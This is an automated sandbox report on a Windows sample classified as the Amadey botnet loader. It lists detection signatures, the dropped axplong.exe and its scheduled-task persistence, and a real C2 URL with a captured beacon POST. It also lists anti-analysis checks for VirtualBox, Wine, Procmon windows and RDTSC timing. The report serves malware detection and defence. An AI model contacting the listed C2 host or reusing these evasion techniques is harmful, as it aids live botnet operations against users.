Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519481
MD5:	cc58b885ac20a4b1cdc8e9174a6e8703
SHA1:	6083c47a6c956443dca245aa136af1bde2630447
SHA256:	3fe2e0b2d033bd7237b70928b032193bd7cb8f644a78e88ddb481c90721db498
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 3416 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CC58B885AC20A4B1CDC8E9174A6E8703)

axplong.exe (PID: 5000 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: CC58B885AC20A4B1CDC8E9174A6E8703)

axplong.exe (PID: 7112 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: CC58B885AC20A4B1CDC8E9174A6E8703)

axplong.exe (PID: 6392 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: CC58B885AC20A4B1CDC8E9174A6E8703)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.2295538512.0000000000261000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2268543897.0000000000A41000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000003.2706394486.0000000004A80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000003.2255300359.00000000051C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.2237964071.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.2181826515.0000000005330000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.2278205377.0000000000261000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.file.exe.a40000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.axplong.exe.260000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
8.2.axplong.exe.260000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.axplong.exe.260000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T15:42:34.422694+0200	2856147	1	A Network Trojan was detected	192.168.2.6	52348	185.215.113.16	80	TCP

HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php-k
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php2l
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php5
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpXkt
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpYlu
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpiQ
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpike
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedb
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnlf
Source: axplong.exe, 00000008.00000002.3429938942.0000000000C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpoM
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu
Source: axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php~k

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_002A3068	8_2_002A3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_00264CF0	8_2_00264CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_00297D83	8_2_00297D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_002A765B	8_2_002A765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_00264AF0	8_2_00264AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_002A8720	8_2_002A8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_002A6F09	8_2_002A6F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_002A777B	8_2_002A777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_002A2BD0	8_2_002A2BD0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9975412976839237
Source: file.exe	Static PE information: Section: cyjncunv ZLIB complexity 0.9946675492791998
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9975412976839237
Source: axplong.exe.0.dr	Static PE information: Section: cyjncunv ZLIB complexity 0.9946675492791998

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@2/1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 52%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1943552 > 1048576

Source: file.exe

Static PE information: Raw size of cyjncunv is bigger than: 0x100000 < 0x1a8e00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.a40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.260000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.260000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 8.2.axplong.exe.260000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyjncunv:EW;zwriwafc:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1e7fe1 should be: 0x1e96cc
Source: file.exe	Static PE information: real checksum: 0x1e7fe1 should be: 0x1e96cc

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: cyjncunv
Source: file.exe	Static PE information: section name: zwriwafc
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: cyjncunv
Source: axplong.exe.0.dr	Static PE information: section name: zwriwafc
Source: axplong.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 8_2_0027D84C push ecx; ret

8_2_0027D85F

Source: file.exe	Static PE information: section name: entropy: 7.986737660676203
Source: file.exe	Static PE information: section name: cyjncunv entropy: 7.953951929244691
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.986737660676203
Source: axplong.exe.0.dr	Static PE information: section name: cyjncunv entropy: 7.953951929244691

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAE975 second address: AAE97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C191DF second address: C191E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C281D0 second address: C281DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA22C516E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C281DA second address: C281DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2844D second address: C28452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BC09 second address: C2BC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BCD0 second address: C2BD30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jp 00007FA22C516E40h 0x00000010 jmp 00007FA22C516E3Ah 0x00000015 pop eax 0x00000016 mov dh, 11h 0x00000018 push 00000003h 0x0000001a mov cx, 5220h 0x0000001e push 00000000h 0x00000020 jmp 00007FA22C516E3Bh 0x00000025 call 00007FA22C516E44h 0x0000002a pushad 0x0000002b movzx edx, cx 0x0000002e sbb bx, D164h 0x00000033 popad 0x00000034 pop edi 0x00000035 push 00000003h 0x00000037 xor esi, 02EE8612h 0x0000003d push BD5DEB92h 0x00000042 push ebx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BDB0 second address: C2BDB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BDB5 second address: C2BDBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
